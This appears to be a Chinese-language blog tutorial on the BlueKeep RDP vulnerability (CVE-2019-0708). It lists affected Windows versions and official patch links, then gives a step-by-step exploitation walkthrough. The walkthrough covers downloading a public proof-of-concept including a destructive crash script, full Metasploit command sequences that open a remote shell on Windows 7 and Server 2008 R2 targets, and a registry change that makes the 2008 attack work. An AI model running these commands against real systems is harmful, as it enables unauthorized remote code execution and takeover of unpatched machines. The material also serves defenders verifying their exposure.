漏洞影响范围:
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows XP SP3 x86
Windows XP Professional x64 Edition SP2
Windows XP Embedded SP3 x86
Windows Server 2003 SP2 x86
Windows Server 2003 x64 Edition SP2
微软补丁下载(不包括XP和2003):
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
Windows Server 2003 漏洞补丁系列下载地址
Windows Server 2003 32位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe
Windows XP 漏洞补丁系列下载地址
Windows XP 32位系统:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe
国内漏洞编号(CNVD-2019-14264、CNNVD-201905-434)
使用python脚本复现
1.准备一台安装了python3的机器(win或linux都可以)
2.下载https://github.com/n1xbyte/CVE-2019-0708的相关文件
poc.py(验证漏洞是否存在)
crashpoc.sh(进行破坏性攻击)
python xx.py ipAddress 32or64(目标win是32位还是64位)
3.安装impacket、Structure扩展包
pip3 install impacket
pip3 install Structure
4.安装openssl
5.给以上两个python文件赋予权限并执行
使用metasploit复现
下载metasploit相关文件:
下载地址:https://github.com/rapid7/metasploit-framework
下载RDP依赖:metasploit-framework/lib/msf/core/exploit/rdp.rb
下载RDP扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
下载cve-0708扫描模块:metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
下载cve-0708利用模块:metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
攻击windows 7 SP1 复现CVE-2019-0708
msfconsole
msf5> reload_all
msf5> search cve_2019_0708_bluekeep_rce
msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > shell
如果成功的话就会进入rhost的ms-dos,可以输入whoami、net user查看相关信息
攻击windows 2008 R2 SP1 复现CVE-2019-0708
需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam]值修改为0(系统默认为1)
在MSF下执行如下命令:
msf5 > search cve_2019_0708_bluekeep_rce
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
网友评论